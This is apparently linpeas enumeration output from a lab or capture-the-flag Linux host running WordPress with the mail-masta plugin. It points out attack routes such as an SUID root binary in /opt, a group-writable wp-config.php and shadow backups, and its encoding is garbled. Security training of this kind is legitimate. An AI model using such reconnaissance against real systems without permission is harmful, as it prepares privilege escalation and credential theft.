/var/www/html/h3l105/wp-admin/network/freedoms.php
#)You_can_write_even_more_files_inside_last_directory
/var/www/html/h3l105/wp-admin/options-discussion.php
/var/www/html/h3l105/wp-admin/options-general.php
/var/www/html/h3l105/wp-admin/options-head.php
/var/www/html/h3l105/wp-admin/options-media.php
/var/www/html/h3l105/wp-admin/options-permalink.php
#)You_can_write_even_more_files_inside_last_directory
/var/www/html/h3l105/wp-admin/user/about.php
/var/www/html/h3l105/wp-admin/user/admin.php
/var/www/html/h3l105/wp-admin/user/credits.php
/var/www/html/h3l105/wp-admin/user/freedoms.php
/var/www/html/h3l105/wp-admin/user/index.php
#)You_can_write_even_more_files_inside_last_directory
/var/www/html/h3l105/wp-admin/users.php
/var/www/html/h3l105/wp-admin/widgets.php
/var/www/html/h3l105/wp-blog-header.php
/var/www/html/h3l105/wp-comments-post.php
/var/www/html/h3l105/wp-config-sample.php
/var/www/html/h3l105/wp-config.php
/var/www/html/h3l105/wp-content
/var/www/html/h3l105/wp-content/index.php
/var/www/html/h3l105/wp-content/plugins
/var/www/html/h3l105/wp-content/plugins/akismet
/var/www/html/h3l105/wp-content/plugins/akismet/.htaccess
/var/www/html/h3l105/wp-content/plugins/akismet/LICENSE.txt
/var/www/html/h3l105/wp-content/plugins/akismet/_inc
/var/www/html/h3l105/wp-content/plugins/akismet/_inc/akismet.css
/var/www/html/h3l105/wp-content/plugins/akismet/_inc/akismet.js
/var/www/html/h3l105/wp-content/plugins/akismet/_inc/form.js
/var/www/html/h3l105/wp-content/plugins/akismet/_inc/img
/var/www/html/h3l105/wp-content/plugins/akismet/akismet.php
/var/www/html/h3l105/wp-content/plugins/akismet/class.akismet-admin.php
/var/www/html/h3l105/wp-content/plugins/akismet/class.akismet-cli.php
/var/www/html/h3l105/wp-content/plugins/akismet/class.akismet-rest-api.php
/var/www/html/h3l105/wp-content/plugins/akismet/class.akismet-widget.php
#)You_can_write_even_more_files_inside_last_directory
/var/www/html/h3l105/wp-content/plugins/akismet/views/config.php
/var/www/html/h3l105/wp-content/plugins/akismet/views/get.php
/var/www/html/h3l105/wp-content/plugins/akismet/views/notice.php
/var/www/html/h3l105/wp-content/plugins/akismet/views/start.php
/var/www/html/h3l105/wp-content/plugins/akismet/views/stats.php
/var/www/html/h3l105/wp-content/plugins/akismet/wrapper.php
/var/www/html/h3l105/wp-content/plugins/hello.php
/var/www/html/h3l105/wp-content/plugins/index.php
/var/www/html/h3l105/wp-content/plugins/mail-masta
/var/www/html/h3l105/wp-content/plugins/mail-masta/amazon_api
/var/www/html/h3l105/wp-content/plugins/mail-masta/amazon_api/SimpleEmailService.php
/var/www/html/h3l105/wp-content/plugins/mail-masta/amazon_api/SimpleEmailServiceMessage.php
/var/www/html/h3l105/wp-content/plugins/mail-masta/amazon_api/SimpleEmailServiceRequest.php
/var/www/html/h3l105/wp-content/plugins/mail-masta/inc
/var/www/html/h3l105/wp-content/plugins/mail-masta/inc/ajax_listing.php
ââââââââââââĢ Interesting GROUP writable files (not in Home) (max 200)
â https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-files
Group helios:
/var/www/html/h3l105/wp-config.php
âââââââââââââââââââââââââââ
âââââââââââââââââââââââââââââĢ Other Interesting Files â ââââââââââââââââââââââââââââ
âââââââââââââââââââââââââââ
ââââââââââââĢ .sh files in path
â https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scriptbinaries-in-path
/usr/bin/gettext.sh
ââââââââââââĢ Executable files potentially added by user (limit 70)
2025-05-28+16:06:43.7559391060 /tmp/linpeas.sh
2019-06-28+20:21:27.5273399290 /opt/statuscheck
2019-06-28+19:46:49.5241496940 /var/www/html/h3l105/wp-content/plugins/mail-masta/amazon_api/SimpleEmailServiceRequest.php
2019-06-28+19:46:49.5241496940 /var/www/html/h3l105/wp-content/plugins/mail-masta/amazon_api/SimpleEmailServiceMessage.php
2019-06-28+19:46:49.5201496870 /var/www/html/h3l105/wp-content/plugins/mail-masta/amazon_api/SimpleEmailService.php
2019-06-28+19:46:49.5161496820 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/jquery-ui-timepicker-addon.js
2019-06-28+19:46:49.5121496760 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/jquery.min.js
2019-06-28+19:46:49.5081496700 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/subscriber.js
2019-06-28+19:46:49.5001496580 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/jquery.validationEngine.js
2019-06-28+19:46:49.4881496390 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/bootstrap.js
2019-06-28+19:46:49.4841496330 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/validation.js
2019-06-28+19:46:49.4841496330 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/jquery.selectbox-0.2.min.js
2019-06-28+19:46:49.4801496270 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/css/font-awesome.min.css
2019-06-28+19:46:49.4801496270 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/Chart.js
2019-06-28+19:46:49.4761496210 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/css/validationEngine.jquery.css
2019-06-28+19:46:49.4761496210 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/css/jquery-ui.css
2019-06-28+19:46:49.4721496150 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/css/images/b-9-2.png
2019-06-28+19:46:49.4681496090 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/css/images/2.png
2019-06-28+19:46:49.4601495970 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/css/images/iam-create-mailmasta-user.jpg
2019-06-28+19:46:49.4601495970 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/css/images/green_check.jpeg
2019-06-28+19:46:49.4521495840 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/css/images/9-2.png
2019-06-28+19:46:49.4481495780 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/css/images/select-icons.png
2019-06-28+19:46:49.4481495780 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/css/images/b-3.png
2019-06-28+19:46:49.4441495720 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/css/images/unnamed.jpg
2019-06-28+19:46:49.4361495600 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/css/images/5.png
2019-06-28+19:46:49.4321495540 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/css/images/mailmasta-finalmail.png
2019-06-28+19:46:49.4241495420 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/css/images/b-9.png
2019-06-28+19:46:49.4201495350 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/css/images/report-icon.png
2019-06-28+19:46:49.4201495350 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/css/images/calendar.png
2019-06-28+19:46:49.4161495300 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/css/images/view-icon.png
2019-06-28+19:46:49.4161495300 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/css/images/9.png
2019-06-28+19:46:49.4121495240 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/css/images/verified-senders.jpg
2019-06-28+19:46:49.4121495240 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/css/images/select-icons_new.png
2019-06-28+19:46:49.4121495240 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/css/images/loading.gif
2019-06-28+19:46:49.4081495180 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/css/images/b-4.png
2019-06-28+19:46:49.4041495120 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/css/images/iam-create-mailmasta-user (1).jpg
2019-06-28+19:46:49.3881494860 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/css/images/3.png
2019-06-28+19:46:49.3841494810 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/css/images/b-5.png
2019-06-28+19:46:49.3761494690 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/css/images/4.png
2019-06-28+19:46:49.3721494630 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/css/mm_frontend.css
2019-06-28+19:46:49.3721494630 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/css/mail-masta.css
2019-06-28+19:46:49.3681494570 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/css/jquery.selectbox.css
2019-06-28+19:46:49.3681494570 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/css/jquery.datetimepicker.css
2019-06-28+19:46:49.3681494570 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/css/bootstrap.css
2019-06-28+19:46:49.3641494510 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/readme.md
2019-06-28+19:46:49.3601494450 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/bootstrap-timepicker.js
2019-06-28+19:46:49.3481494260 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/jquery-ui.js
2019-06-28+19:46:49.3361494080 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/fonts/FontAwesome.otf
2019-06-28+19:46:49.3321494020 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/fonts/fontawesome-webfont.woff
2019-06-28+19:46:49.3321494020 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/fonts/fontawesome-webfont.ttf
2019-06-28+19:46:49.3281493960 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/fonts/fontawesome-webfont.svg
2019-06-28+19:46:49.3281493960 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/fonts/fontawesome-webfont.eot
2019-06-28+19:46:49.3201493830 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/subscriber1.js
2019-06-28+19:46:49.3201493830 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/LICENSE.md
2019-06-28+19:46:49.3201493830 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/Chart.min.js
2019-06-28+19:46:49.3161493770 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/jquery.validationEngine-en.js
2019-06-28+19:46:49.3161493770 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/custom.js
2019-06-28+19:46:49.3161493770 /var/www/html/h3l105/wp-content/plugins/mail-masta/lib/component.json
2019-06-28+19:46:49.3081493650 /var/www/html/h3l105/wp-content/plugins/mail-masta/inc/mail-license-data.php
2019-06-28+19:46:49.3041493590 /var/www/html/h3l105/wp-content/plugins/mail-masta/inc/mail-masta-delete.php
2019-06-28+19:46:49.3041493590 /var/www/html/h3l105/wp-content/plugins/mail-masta/inc/campaign_save.php
2019-06-28+19:46:49.3001493530 /var/www/html/h3l105/wp-content/plugins/mail-masta/inc/mail-settings-data.php
2019-06-28+19:46:49.3001493530 /var/www/html/h3l105/wp-content/plugins/mail-masta/inc/mail-list-data.php
2019-06-28+19:46:49.2961493470 /var/www/html/h3l105/wp-content/plugins/mail-masta/inc/subscriber_list.php
2019-06-28+19:46:49.2881493350 /var/www/html/h3l105/wp-content/plugins/mail-masta/inc/form_listing.php
2019-06-28+19:46:49.2841493290 /var/www/html/h3l105/wp-content/plugins/mail-masta/inc/mail-autoresponder-data.php
2019-06-28+19:46:49.2761493170 /var/www/html/h3l105/wp-content/plugins/mail-masta/inc/mail-masta-lists.php
2019-06-28+19:46:49.2721493110 /var/www/html/h3l105/wp-content/plugins/mail-masta/inc/masta_license.php
2019-06-28+19:46:49.2721493110 /var/www/html/h3l105/wp-content/plugins/mail-masta/inc/campaign_delete.php
2019-06-28+19:46:49.2721493110 /var/www/html/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php
ââââââââââââĢ Unexpected in /opt (usually empty)
total 20
drwxr-xr-x 2 root root 4096 Jun 28 2019 .
drwxr-xr-x 22 root root 4096 Jun 28 2019 ..
-rwsr-xr-x 1 root root 8640 Jun 28 2019 statuscheck
ââââââââââââĢ Unexpected in root
/initrd.img
/vmlinuz.old
/vmlinuz
/initrd.img.old
ââââââââââââĢ Modified interesting files in the last 5mins (limit 100)
/var/log/messages
/var/log/syslog
/var/log/kern.log
/var/log/auth.log
/var/log/daemon.log
/var/cache/samba/browse.dat
/etc/resolv.conf
/home/helios/.gnupg/pubring.kbx
/home/helios/.gnupg/trustdb.gpg
logrotate 3.11.0
ââââââââââââĢ Files inside /home/helios (limit 20)
total 28
drwxr-xr-x 4 helios helios 4096 May 28 16:07 .
drwxr-xr-x 3 root root 4096 Jun 28 2019 ..
lrwxrwxrwx 1 root root 9 Jun 28 2019 .bash_history -> /dev/null
-rw-r--r-- 1 helios helios 220 Jun 28 2019 .bash_logout
-rw-r--r-- 1 helios helios 3526 Jun 28 2019 .bashrc
drwx------ 3 helios helios 4096 May 28 16:07 .gnupg
-rw-r--r-- 1 helios helios 675 Jun 28 2019 .profile
drwxr-xr-x 2 helios helios 4096 Jun 28 2019 share
ââââââââââââĢ Files inside others home (limit 20)
/var/www/html/image.jpg
/var/www/html/index.html
/var/www/html/h3l105/wp-login.php
/var/www/html/h3l105/readme.html
/var/www/html/h3l105/wp-settings.php
/var/www/html/h3l105/wp-comments-post.php
/var/www/html/h3l105/wp-signup.php
/var/www/html/h3l105/xmlrpc.php
/var/www/html/h3l105/wp-content/uploads/siteeditor/sed_general_date_archive.css
/var/www/html/h3l105/wp-content/uploads/siteeditor/sed_post1.css
/var/www/html/h3l105/wp-content/uploads/siteeditor/sed_general_home.css
/var/www/html/h3l105/wp-content/uploads/siteeditor/sed_general_author.css
/var/www/html/h3l105/wp-content/uploads/2019/06/image.png
/var/www/html/h3l105/wp-content/uploads/2019/06/image-1.png
/var/www/html/h3l105/wp-content/uploads/2019/06/maxresdefault.jpg
/var/www/html/h3l105/wp-content/plugins/mail-masta/lib/jquery.validationEngine.js
/var/www/html/h3l105/wp-content/plugins/mail-masta/lib/subscriber.js
/var/www/html/h3l105/wp-content/plugins/mail-masta/lib/jquery-ui.js
/var/www/html/h3l105/wp-content/plugins/mail-masta/lib/custom.js
/var/www/html/h3l105/wp-content/plugins/mail-masta/lib/bootstrap.js
grep: write error: Broken pipe
ââââââââââââĢ Searching installed mail applications
postfix
postfix-add-filter
postfix-add-policy
sendmail
ââââââââââââĢ Mails (limit 50)
265067 8 -rw------- 1 helios mail 4445 May 27 11:10 /var/mail/helios
265067 8 -rw------- 1 helios mail 4445 May 27 11:10 /var/spool/mail/helios
ââââââââââââĢ Backup folders
drwxr-xr-x 2 root root 4096 May 22 06:25 /var/backups
total 520
-rw-r--r-- 1 root root 51200 May 22 06:25 alternatives.tar.0
-rw-r--r-- 1 root root 13873 Jun 28 2019 apt.extended_states.0
-rw-r--r-- 1 root root 280 Jun 28 2019 dpkg.diversions.0
-rw-r--r-- 1 root root 343 Jun 28 2019 dpkg.statoverride.0
-rw-r--r-- 1 root root 434431 Jun 28 2019 dpkg.status.0
-rw------- 1 root root 789 Jun 28 2019 group.bak
-rw------- 1 root shadow 665 Jun 28 2019 gshadow.bak
-rw------- 1 root root 1534 Jun 28 2019 passwd.bak
-rw------- 1 root shadow 1021 Jun 28 2019 shadow.bak
ââââââââââââĢ Backup files (limited 100)
-rwxr-xr-x 1 root root 21282 Apr 16 2019 /usr/bin/wsrep_sst_xtrabackup
-rwxr-xr-x 1 root root 14328 Oct 9 2016 /usr/bin/tdbbackup.tdbtools
-rwxr-xr-x 1 root root 40835 Apr 16 2019 /usr/bin/wsrep_sst_xtrabackup-v2
-rwxr-xr-x 1 root root 18156392 Apr 16 2019 /usr/bin/mariabackup
-rwxr-xr-x 1 root root 35324 Apr 16 2019 /usr/bin/wsrep_sst_mariabackup
-rw-r--r-- 1 root root 331845 Mar 13 2017 /usr/share/doc/manpages/Changes.old.gz
-rw-r--r-- 1 root root 7867 Nov 7 2016 /usr/share/doc/telnet/README.telnet.old.gz
-rw-r--r-- 1 root root 303 May 15 2018 /usr/share/doc/hdparm/changelog.old.gz
-rw-r--r-- 1 root root 351 Apr 16 2019 /usr/share/man/man1/wsrep_sst_xtrabackup.1.gz
-rw-r--r-- 1 root root 348 Apr 16 2019 /usr/share/man/man1/wsrep_sst_mariabackup.1.gz
-rw-r--r-- 1 root root 357 Apr 16 2019 /usr/share/man/man1/wsrep_sst_xtrabackup-v2.1.gz
-rw-r--r-- 1 root root 1624 Oct 9 2016 /usr/share/man/man8/tdbbackup.tdbtools.8.gz
-rw-r--r-- 1 root root 7896 Jun 16 2019 /lib/modules/4.9.0-9-amd64/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 128 Jun 28 2019 /var/lib/sgml-base/supercatalog.old
-rw-r--r-- 1 root root 673 Jun 28 2019 /etc/xml/xml-core.xml.old
-rw-r--r-- 1 root root 610 Jun 28 2019 /etc/xml/catalog.old
ââââââââââââĢ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /etc/aliases.db: Berkeley DB (Hash, version 9, native byte-order)
Found /var/lib/postfix/smtp_scache.db: regular file, no read permission
Found /var/lib/postfix/smtpd_scache.db: regular file, no read permission
Found /var/www/html/h3l105/wp-content/plugins/site-editor/editor/assets/images/Thumbs.db: Composite Document File V2 Document, Cannot read section info
ââââââââââââĢ Web files?(output limit)
/var/www/:
total 12K
drwxr-xr-x 3 root root 4.0K Jun 28 2019 .
drwxr-xr-x 12 root root 4.0K Jun 28 2019 ..
drwxr-xr-x 3 helios helios 4.0K Jun 28 2019 html
/var/www/html:
total 116K
drwxr-xr-x 3 helios helios 4.0K Jun 28 2019 .
drwxr-xr-x 3 root root 4.0K Jun 28 2019 ..
ââââââââââââĢ All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r-- 1 helios helios 456 Jun 28 2019 /var/www/html/h3l105/wp-content/plugins/site-editor/framework/assets/less/siteeditor/bootstrap/.csslintrc
-rw-r--r-- 1 helios helios 8099 Jun 28 2019 /var/www/html/h3l105/wp-content/plugins/site-editor/framework/assets/less/siteeditor/bootstrap/.csscomb.json
-rw-r--r-- 1 helios helios 629 Jun 28 2019 /var/www/html/h3l105/wp-content/plugins/akismet/.htaccess
-rw-r--r-- 1 helios helios 249 Jun 28 2019 /var/www/html/h3l105/.htaccess
-rw------- 1 root root 0 Jun 28 2019 /etc/.pwd.lock
-rw-r--r-- 1 root root 220 May 15 2017 /etc/skel/.bash_logout
-rw-r--r-- 1 root root 0 May 28 14:28 /run/network/.ifstate.lock
-rw-r--r-- 1 helios helios 220 Jun 28 2019 /home/helios/.bash_logout
ââââââââââââĢ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rwx------ 1 helios helios 840139 May 28 16:06 /tmp/linpeas.sh
-rw-r--r-- 1 root root 51200 May 22 06:25 /var/backups/alternatives.tar.0
ââââââââââââĢ Searching passwords in history files
ââââââââââââĢ Searching passwords in config PHP files
/var/www/html/h3l105/wp-admin/setup-config.php: $pwd = trim( wp_unslash( $_POST['pwd'] ) );
ââââââââââââĢ Searching *password* or *credential* files in home (limit 70)
/bin/systemd-ask-password
/bin/systemd-tty-ask-password-agent
/etc/pam.d/common-password
/usr/lib/grub/i386-pc/legacy_password_test.mod
/usr/lib/grub/i386-pc/password.mod
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/python2.7/dist-packages/samba/credentials.x86_64-linux-gnu.so
/usr/lib/python2.7/dist-packages/samba/tests/credentials.py
/usr/lib/python2.7/dist-packages/samba/tests/credentials.pyc
/usr/lib/python2.7/dist-packages/samba/tests/samba_tool/user_check_password_script.py
/usr/lib/python2.7/dist-packages/samba/tests/samba_tool/user_check_password_script.pyc
/usr/lib/x86_64-linux-gnu/libsamba-credentials.so.0
/usr/lib/x86_64-linux-gnu/libsamba-credentials.so.0.0.1
/usr/lib/x86_64-linux-gnu/mariadb18/plugin/mysql_clear_password.so
/usr/lib/x86_64-linux-gnu/mariadb18/plugin/simple_password_check.so
/usr/lib/x86_64-linux-gnu/samba/ldb/local_password.so
/usr/lib/x86_64-linux-gnu/samba/ldb/password_hash.so
/usr/lib/x86_64-linux-gnu/samba/libcmdline-credentials.so.0
/usr/share/doc/apache2-doc/manual/da/misc/password_encryptions.html
/usr/share/doc/apache2-doc/manual/de/misc/password_encryptions.html
/usr/share/doc/apache2-doc/manual/en/misc/password_encryptions.html
/usr/share/doc/apache2-doc/manual/es/misc/password_encryptions.html
/usr/share/doc/apache2-doc/manual/fr/misc/password_encryptions.html
/usr/share/doc/apache2-doc/manual/ja/misc/password_encryptions.html
/usr/share/doc/apache2-doc/manual/ko/misc/password_encryptions.html
/usr/share/doc/apache2-doc/manual/pt-br/misc/password_encryptions.html
/usr/share/doc/apache2-doc/manual/tr/misc/password_encryptions.html
/usr/share/doc/apache2-doc/manual/zh-cn/misc/password_encryptions.html
/usr/share/man/man1/systemd-ask-password.1.gz
/usr/share/man/man1/systemd-tty-ask-password-agent.1.gz
/usr/share/man/man7/credentials.7.gz
/usr/share/man/man8/systemd-ask-password-console.path.8.gz
/usr/share/man/man8/systemd-ask-password-console.service.8.gz
/usr/share/man/man8/systemd-ask-password-wall.path.8.gz
/usr/share/man/man8/systemd-ask-password-wall.service.8.gz
#)There are more creds/passwds files in the previous parent folder
/usr/share/pam/common-password.md5sums
/var/cache/debconf/passwords.dat
/var/lib/pam/password
/var/www/html/h3l105/wp-admin/js/password-strength-meter.js
/var/www/html/h3l105/wp-admin/js/password-strength-meter.min.js
ââââââââââââĢ Checking for TTY (sudo/su) passwords in audit logs
ââââââââââââĢ Checking for TTY (sudo/su) passwords in audit logs
ââââââââââââĢ Searching passwords inside logs (limit 70)
/var/log/dpkg.log:2019-06-29 00:26:31 configure base-passwd:amd64 3.5.43 3.5.43
/var/log/dpkg.log:2019-06-29 00:26:31 install base-passwd:amd64 <none> 3.5.43
/var/log/dpkg.log:2019-06-29 00:26:31 status half-configured base-passwd:amd64 3.5.43
/var/log/dpkg.log:2019-06-29 00:26:31 status half-installed base-passwd:amd64 3.5.43
/var/log/dpkg.log:2019-06-29 00:26:31 status installed base-passwd:amd64 3.5.43
/var/log/dpkg.log:2019-06-29 00:26:31 status unpacked base-passwd:amd64 3.5.43
/var/log/dpkg.log:2019-06-29 00:26:35 status half-configured base-passwd:amd64 3.5.43
/var/log/dpkg.log:2019-06-29 00:26:35 status half-installed base-passwd:amd64 3.5.43
/var/log/dpkg.log:2019-06-29 00:26:35 status unpacked base-passwd:amd64 3.5.43
/var/log/dpkg.log:2019-06-29 00:26:35 upgrade base-passwd:amd64 3.5.43 3.5.43
/var/log/dpkg.log:2019-06-29 00:26:37 install passwd:amd64 <none> 1:4.4-4.1
/var/log/dpkg.log:2019-06-29 00:26:37 status half-installed passwd:amd64 1:4.4-4.1
/var/log/dpkg.log:2019-06-29 00:26:38 status unpacked passwd:amd64 1:4.4-4.1
/var/log/dpkg.log:2019-06-29 00:26:39 configure base-passwd:amd64 3.5.43 <none>
/var/log/dpkg.log:2019-06-29 00:26:39 status half-configured base-passwd:amd64 3.5.43
/var/log/dpkg.log:2019-06-29 00:26:39 status installed base-passwd:amd64 3.5.43
/var/log/dpkg.log:2019-06-29 00:26:39 status unpacked base-passwd:amd64 3.5.43
/var/log/dpkg.log:2019-06-29 00:26:40 configure passwd:amd64 1:4.4-4.1 <none>
/var/log/dpkg.log:2019-06-29 00:26:40 status half-configured passwd:amd64 1:4.4-4.1
/var/log/dpkg.log:2019-06-29 00:26:40 status installed passwd:amd64 1:4.4-4.1
/var/log/dpkg.log:2019-06-29 00:26:40 status unpacked passwd:amd64 1:4.4-4.1
/var/log/installer/status:Description: Set up users and passwords
ââââââââââââââââââ
âââââââââââââââââââââââââââââââââĢ API Keys Regex â ââââââââââââââââââââââââââââââââ
ââââââââââââââââââ
Regexes to search for API keys aren't activated, use param '-r'